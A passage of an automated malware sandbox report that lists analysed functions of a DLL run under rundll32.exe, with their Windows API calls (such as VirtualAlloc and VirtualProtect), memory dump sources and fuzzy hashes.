Instruction Fuzzy Hash: CB21747160861ABFAB109F678C80D6BB7ADFF413EA7158528E57897250EF30ED4087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E1C59, Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90048043458cb529fc2dd9bf2d08777c91f28de660d77a6deb805bc36c011fbe
Instruction ID: 76227c668dfce68c6afca3ddfea8e4319b5ef131d245a6f4b917d9ce4e8b7302
Opcode Fuzzy Hash: 90048043458cb529fc2dd9bf2d08777c91f28de660d77a6deb805bc36c011fbe
Instruction Fuzzy Hash: B021DB71E85621B7DF1287649C84F6A37686F427E2B224115ED16E7381D730ED01C9D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E02DC, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D4E4315,?,00000001,6D4E27CC,?,6D4E47D4,00000001,?,?,?,6D4E275B,?,?), ref: 6D4E02E1
_free.LIBCMT ref: 6D4E033E
_free.LIBCMT ref: 6D4E0374
SetLastError.KERNEL32(00000000,6D5090D0,000000FF,?,6D4E47D4,00000001,?,?,?,6D4E275B,?,?,?,6D508130,0000002C,6D4E27CC), ref: 6D4E037F

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: edc94fe845f42eeb7999e2d98891cc47cb05a2d53c6c0e6261b03449cef67b08
Instruction ID: bc7ff0b20d7f609026df3f0d8012ee6f409ee0379b525228fc4f6e7f9b639ad0
Opcode Fuzzy Hash: edc94fe845f42eeb7999e2d98891cc47cb05a2d53c6c0e6261b03449cef67b08
Instruction Fuzzy Hash: D011A7362496067BDB31967A5C80F2B217A9BC23FBB2A422CF234962D5DF308C018550

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0433, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,00000001,6D509096,6D4E06CB,6D4E0611,6D509094,?,6D4DC2F9,6D509096,6D509094,?,?,?,6D4DA14E,00000001,6D509098), ref: 6D4E0438
_free.LIBCMT ref: 6D4E0495
_free.LIBCMT ref: 6D4E04CB
SetLastError.KERNEL32(00000000,6D5090D0,000000FF,?,6D4DC2F9,6D509096,6D509094,?,?,?,6D4DA14E,00000001,6D509098), ref: 6D4E04D6

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3fb5ec5ec5484db0adeb2277af4f899019c83b27173f1c2a41f3d0bd06ad8900
Instruction ID: d2b9641afe75566c3df2180903c3c2a59ed5fbd2900c54d7c1ea34eb1fb69cbd
Opcode Fuzzy Hash: 3fb5ec5ec5484db0adeb2277af4f899019c83b27173f1c2a41f3d0bd06ad8900
Instruction Fuzzy Hash: F911AC366496023ADF11967ADD84F27227A9BC22F7B2A433CF638A62D0DF318C018550

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE723, Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,6D4DE7E4,?,?,6D51AA24,00000000,?,6D4DE90F,00000004,6D5033BC,6D5033B4,6D5033BC,00000000), ref: 6D4DE7B3

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4a1bd830db653b9bcb64f7bfc0708b143fb34a1f190c85c708bc371cb3526e21
Instruction ID: a649fcededa5587265eb86119c4e5a96778eb533337fca3aa28abf5dba02169a
Opcode Fuzzy Hash: 4a1bd830db653b9bcb64f7bfc0708b143fb34a1f190c85c708bc371cb3526e21
Instruction Fuzzy Hash: E211C636A45622ABDFE29A68CCD4F5AB7B4AF03770F254131EA55E7380D770ED0086D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E5566, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6D4E27CC,00000000,?,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001), ref: 6D4E557D
GetLastError.KERNEL32(?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000,00000001,?,6D4E47F8,['Nm), ref: 6D4E5589

Part of subcall function 6D4E554F: CloseHandle.KERNEL32(6D5098D0,6D4E5599,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000,00000001), ref: 6D4E555F

___initconout.LIBCMT ref: 6D4E5599

Part of subcall function 6D4E5511: CreateFileW.KERNEL32(6D506778,40000000,00000003,00000000,00000003,00000000,00000000,6D4E5540,6D4E4FB3,00000001,?,6D4E42A4,00000000,?,00000001,00000000), ref: 6D4E5524

WriteConsoleW.KERNEL32(?,?,6D4E27CC,00000000,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000), ref: 6D4E55AE

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 134fd8dc7592037b65b20d183cb1df952f1fa42d2732f5d0a19895be7a0a1cf1
Instruction ID: 3bcd926009afb093f79b9f06d150f185f46bab88ac14716b933eb004d59d138d
Opcode Fuzzy Hash: 134fd8dc7592037b65b20d183cb1df952f1fa42d2732f5d0a19895be7a0a1cf1
Instruction Fuzzy Hash: 82F0F836401965BBCF626F958D08E993F76EF8A3B2F064014FA1985224C732CD20DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DAAB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6D4DAC20

Strings

<(Pm, xrefs: 6D4DAC2B
ror, xrefs: 6D4DAAE6

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ___std_exception_copy
String ID: <(Pm$ror
API String ID: 2659868963-41268868
Opcode ID: 966ee975c3b5f3a4e84d5b9a4e35da1e41acf5d4b045e71224632e3ea29cf407
Instruction ID: ae9e63782f77de96b7dbb02a5cb8ea27e6947205f72484eed556feca819f5874
Opcode Fuzzy Hash: 966ee975c3b5f3a4e84d5b9a4e35da1e41acf5d4b045e71224632e3ea29cf407
Instruction Fuzzy Hash: 2651E371E002489FDB14CFA8C994FAEBBB5FF59314F10861DE415AB781E734A981CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DF2D2, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6D4DF315, 6D4DF31C, 6D4DF352

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: dcde4c5a45d6d83b7da112a86d4e4c58b6338dcdfb7da2fa392839708ae48de0
Instruction ID: dcfa42301ab0a8c8956bc2f256245151bf5792ca795e8657f5b9126778770e33
Opcode Fuzzy Hash: dcde4c5a45d6d83b7da112a86d4e4c58b6338dcdfb7da2fa392839708ae48de0
Instruction Fuzzy Hash: 00419371A05695AFDF62CF99CC91EAEBBF8EF85350B2240AAE510D7310D7708E45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD300, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6D4DD33F
__IsNonwritableInCurrentImage.LIBCMT ref: 6D4DD3F3

Strings

csm, xrefs: 6D4DD3DD

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ae63e5f0eb34858746e546229bc7f86adcd5062bd4ac9f53f2e4f3b5cfb33089
Instruction ID: 38b25a93d7347d3eb3b07846872bbac7af8c1b27bf1d54b5ff3a03e315aa8e16
Opcode Fuzzy Hash: ae63e5f0eb34858746e546229bc7f86adcd5062bd4ac9f53f2e4f3b5cfb33089
Instruction Fuzzy Hash: FB41A534A04319ABCF40DF68C890E9EBBB5BF85318F158069E9149B391D731ED11CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E14AA, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6D4E1253: GetOEMCP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E127E

_free.LIBCMT ref: 6D4E1522

Strings

+?Nm, xrefs: 6D4E14DC

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free
String ID: +?Nm
API String ID: 269201875-616114912
Opcode ID: 745cea63aa7fa34a5145602f00bca28f6ececf98b92e613dbe73eca86c9aa858
Instruction ID: 4156e603aa3197cbddcaf9608e4ea8f09e4f836a93d8cef9d94d13628f9a5607
Opcode Fuzzy Hash: 745cea63aa7fa34a5145602f00bca28f6ececf98b92e613dbe73eca86c9aa858
Instruction Fuzzy Hash: E031C17290820ABFCB01DFA8C880F9A77F5AF44356F154169E9269B290EB31DD40CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E1253, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E127E
GetACP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E1295

Strings

+?Nm, xrefs: 6D4E12A2

Memory Dump Source

Source File: 00000003.00000002.1097870842.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_6d4ae000_rundll32.jbxd

Similarity

API ID:
String ID: +?Nm
API String ID: 0-616114912
Opcode ID: bfb02778c3c858c95d9032882147d88b9e6735249fff4f951ca021d7a973990b
Instruction ID: 7934ce9d13a9bf059e9a92883a9c71212572c48ea2739427429b2bae24d8c62b
Opcode Fuzzy Hash: bfb02778c3c858c95d9032882147d88b9e6735249fff4f951ca021d7a973990b
Instruction Fuzzy Hash: 08F04F30944605ABDF12DBA8C84AF6C77B0BB823AAF250748E534DEAD2C7719D85C781

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 4240 Parent PID: 7132 rundll32.exeCOMMON

Executed Functions

Function 6D50B242, Relevance: 13.8, APIs: 9, Instructions: 318
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,000009B2,00003000,00000040,000009B2,6D50AC98), ref: 6D50B2FC
VirtualAlloc.KERNEL32(00000000,000000D7,00003000,00000040,6D50ACFB), ref: 6D50B333
VirtualAlloc.KERNEL32(00000000,00014ED4,00003000,00000040), ref: 6D50B393
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D50B3C9
VirtualProtect.KERNEL32(6D4A0000,00000000,00000004,6D50B221), ref: 6D50B4CE
VirtualProtect.KERNEL32(6D4A0000,00001000,00000004,6D50B221), ref: 6D50B4F5
VirtualProtect.KERNEL32(00000000,?,00000002,6D50B221), ref: 6D50B5C2
VirtualProtect.KERNEL32(00000000,?,00000002,6D50B221,?), ref: 6D50B618
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 6D50B634

Memory Dump Source

Source File: 00000005.00000002.1097587421.000000006D50A000.00000040.00020000.sdmp, Offset: 6D50A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d50a000_rundll32.jbxd

Similarity

API ID: Virtual$Protect$Alloc$Free
String ID:
API String ID: 2574235972-0
Opcode ID: 94db6ec75e7b3355c8b79fe8e1073f7e0b9c5fcc91065ff0fda1bf8dbaf2fb05
Instruction ID: bdba57c5292f3e119830b62cd7a1019b3e19645a0c61d74e42252049a46fec1f
Opcode Fuzzy Hash: 94db6ec75e7b3355c8b79fe8e1073f7e0b9c5fcc91065ff0fda1bf8dbaf2fb05
Instruction Fuzzy Hash: 2BD148725002019FDB25EF58C8C0E6277B6FFAD314B1A4994EE2DAF75AD630A9118F60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DB9D1, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6D4DBA0E
dllmain_crt_dispatch.LIBCMT ref: 6D4DBA25
dllmain_raw.LIBCMT ref: 6D4DBA6D
dllmain_crt_dispatch.LIBCMT ref: 6D4DBA80
dllmain_raw.LIBCMT ref: 6D4DBA93

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 6f2f5998ca6564cf7fdaa765ff7dcbb046bd2065d2ceafd773fd41370acc6677
Instruction ID: db0f3f3ef5772fe3921961364e234be5df0354b2bc8db68b6e23fb630a31b760
Opcode Fuzzy Hash: 6f2f5998ca6564cf7fdaa765ff7dcbb046bd2065d2ceafd773fd41370acc6677
Instruction Fuzzy Hash: 59217A72D0866AAFCBA28E55CC60E7F3A79EF85A94F124159F91867310D7308D028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D7CE0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtectEx.KERNELBASE(000000FF,?,0000416C,00000040,?), ref: 6D4D7E3D

Strings

/, xrefs: 6D4D7CE7
@, xrefs: 6D4D7CF7

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ProtectVirtual
String ID: /$@
API String ID: 544645111-1264875769
Opcode ID: b4c3e638d1386b3da702d118239c8aa9e192c6ab131dfeec69b8bb4a767a6358
Instruction ID: be545fa034a88deb6dde85f956f91dd353d6ab13f640aafc6f9336b99b9925ae
Opcode Fuzzy Hash: b4c3e638d1386b3da702d118239c8aa9e192c6ab131dfeec69b8bb4a767a6358
Instruction Fuzzy Hash: 0EA18B79904154DFDF08CF69C570BA8BBB1BB86302F0EC16EE88587A99E7345A84DF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DB81A, Relevance: 4.6, APIs: 3, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__RTC_Initialize.LIBCMT ref: 6D4DB867

Part of subcall function 6D4DC084: RtlInitializeSListHead.NTDLL(6D51A9E0), ref: 6D4DC089

___scrt_is_nonwritable_in_current_image.LIBCMT ref: 6D4DB8D1
___scrt_fastfail.LIBCMT ref: 6D4DB91B

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: Initialize$HeadList___scrt_fastfail___scrt_is_nonwritable_in_current_image
String ID:
API String ID: 2097537958-0
Opcode ID: 2a0d6fbdc72065d054ee6f895387a690ab9989899cec32a675fa35a34e260e30
Instruction ID: 75dadfaac4119e30d6773af1a4495721f51c7a59a16c647c2f7124e5e21e4ed3
Opcode Fuzzy Hash: 2a0d6fbdc72065d054ee6f895387a690ab9989899cec32a675fa35a34e260e30
Instruction Fuzzy Hash: 0B21C032649246AEEF81EFF4D831FAD77709F4636DF22405DEA9067282CB220C469695

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E06D9, Relevance: 1.5, APIs: 1, Instructions: 39
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000), ref: 6D4E071A

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 056c51b5185a36f06f7ca96c892a373df9f1e65d07f6b33c907681fed2780c50
Instruction ID: 93a8a99ce55b3095ce68f4d6e7e4ddc135cdbb5231a942aa6eeebea029423a22
Opcode Fuzzy Hash: 056c51b5185a36f06f7ca96c892a373df9f1e65d07f6b33c907681fed2780c50
Instruction Fuzzy Hash: 4DF0BB315495377BEF115E278C45F57375CAF817E2B258125AC34D7180DF60DC0149D1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6D4E2D42, Relevance: 19.6, APIs: 13, Instructions: 113
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

___free_lconv_mon.LIBCMT ref: 6D4E2D86

Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C3A
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C4C
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C5E
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C70
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C82
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4C94
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CA6
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CB8
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CCA
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CDC
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4CEE
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4D00
Part of subcall function 6D4E4C1D: _free.LIBCMT ref: 6D4E4D12

_free.LIBCMT ref: 6D4E2D7B

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E2D9D
_free.LIBCMT ref: 6D4E2DB2
_free.LIBCMT ref: 6D4E2DBD
_free.LIBCMT ref: 6D4E2DDF
_free.LIBCMT ref: 6D4E2DF2
_free.LIBCMT ref: 6D4E2E00
_free.LIBCMT ref: 6D4E2E0B
_free.LIBCMT ref: 6D4E2E43
_free.LIBCMT ref: 6D4E2E4A
_free.LIBCMT ref: 6D4E2E67
_free.LIBCMT ref: 6D4E2E7F

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast___free_lconv_mon
String ID:
API String ID: 161543041-0
Opcode ID: 568347eea2d2b90a6c68f00e5c0b2d648ab6afcd9b3ae7505d8530913daeea9d
Instruction ID: 277729690970b8ab667a7af377833be38c685df301199059b0a0792b7c5bbe60
Opcode Fuzzy Hash: 568347eea2d2b90a6c68f00e5c0b2d648ab6afcd9b3ae7505d8530913daeea9d
Instruction Fuzzy Hash: 64313D31908213BFEB319A39D880F6773E5AF00396F218829E565DB290DF34EC40CA60

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD9B0, Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 308
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsInExceptionSpec.LIBVCRUNTIME ref: 6D4DDAAB
type_info::operator==.LIBVCRUNTIME ref: 6D4DDAD2
___TypeMatch.LIBVCRUNTIME ref: 6D4DDBDE
CatchIt.LIBVCRUNTIME ref: 6D4DDC33
IsInExceptionSpec.LIBVCRUNTIME ref: 6D4DDCB9
_UnwindNestedFrames.LIBCMT ref: 6D4DDD40
CallUnexpected.LIBVCRUNTIME ref: 6D4DDD5B

Strings

csm, xrefs: 6D4DDB09
csm, xrefs: 6D4DDA58
csm, xrefs: 6D4DD9EB

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ExceptionSpec$CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: csm$csm$csm
API String ID: 4234981820-393685449
Opcode ID: c88dfd58291b27876d6d9f3e4a1026cdc6f2b43c06ef4391f1698c7e5a7b8aeb
Instruction ID: 176e4d4c6c2e9c8f131b534a43e6d06ade16242f21e31706bf85169b17c038fd
Opcode Fuzzy Hash: c88dfd58291b27876d6d9f3e4a1026cdc6f2b43c06ef4391f1698c7e5a7b8aeb
Instruction Fuzzy Hash: 61C1667180830A9BCF55CFA4C9A0EAEBBB4BF84718F11415AE9156B311D371EE52CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0198, Relevance: 15.1, APIs: 10, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_free.LIBCMT ref: 6D4E01AE

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E01BA
_free.LIBCMT ref: 6D4E01C5
_free.LIBCMT ref: 6D4E01D0
_free.LIBCMT ref: 6D4E01DB
_free.LIBCMT ref: 6D4E01E6
_free.LIBCMT ref: 6D4E01F1
_free.LIBCMT ref: 6D4E01FC
_free.LIBCMT ref: 6D4E0207
_free.LIBCMT ref: 6D4E0215

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 98a57a5b51ee1af6fcc902e3a3fe9210ca30bb7c7e551208d2758686fa4a2458
Instruction ID: 7333431b6b7d2a748bf7151e560242e376712b2d2748dd78ed671c25f4c7171c
Opcode Fuzzy Hash: 98a57a5b51ee1af6fcc902e3a3fe9210ca30bb7c7e551208d2758686fa4a2458
Instruction Fuzzy Hash: 9321FF7A908119BFDF11DFA5C980DEE7BB8BF08285F41816AF6159B120EB35DA45CF80

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E4DBC, Relevance: 10.6, APIs: 7, Instructions: 65
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 6D4E4D84: _free.LIBCMT ref: 6D4E4DA9

_free.LIBCMT ref: 6D4E4E0A

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E4E15
_free.LIBCMT ref: 6D4E4E20
_free.LIBCMT ref: 6D4E4E74
_free.LIBCMT ref: 6D4E4E7F
_free.LIBCMT ref: 6D4E4E8A
_free.LIBCMT ref: 6D4E4E95

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 42c5e9fb9c8a107f3b8bf8ffb1c0d6ba7119298d49e70c01c512aecdb6b53527
Instruction ID: 2377be2a2ea238cda24e10525a1db54bc8df28070bb57ab9367c4e1821790458
Opcode Fuzzy Hash: 42c5e9fb9c8a107f3b8bf8ffb1c0d6ba7119298d49e70c01c512aecdb6b53527
Instruction Fuzzy Hash: 6A118431948B54B6D931EBB2CC45FEB77AC5F0C7D9F41482CA3AD66050EB24FD048A90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E3ECF, Relevance: 9.3, APIs: 6, Instructions: 318
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D4E3F17
__fassign.LIBCMT ref: 6D4E40F6
__fassign.LIBCMT ref: 6D4E4113
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D4E415B
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6D4E419B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6D4E4247

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: a3722549f88305eaf50b6f9706584ce869abe3ba1b1fea4387abcdaf5d67026c
Instruction ID: c234f81b7afb385bdaf08188c61ce5f90c5fdf1f9abd39a9240603d34b4acaaa
Opcode Fuzzy Hash: a3722549f88305eaf50b6f9706584ce869abe3ba1b1fea4387abcdaf5d67026c
Instruction Fuzzy Hash: 74D18B71D04259AFCF15CFE8C880AEDBBB5BF49395F284169E869BB241D730AD06CB50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD679, Relevance: 9.1, APIs: 6, Instructions: 60
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,6D4DD288,6D4DB4EA,6D4DB7F2), ref: 6D4DD687
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6D4DD695
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6D4DD6AE
SetLastError.KERNEL32(00000000,?,6D4DD288,6D4DB4EA,6D4DB7F2), ref: 6D4DD700

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 1cfb65accd97bfd254efd22606ae9ef946a57f7f1d061dffd374167ea91001fe
Instruction ID: 27faa6a5570bec9d8a88c1e4bfd2dae2f696f17ed23cde4d4ae8b3e8c3ba3f41
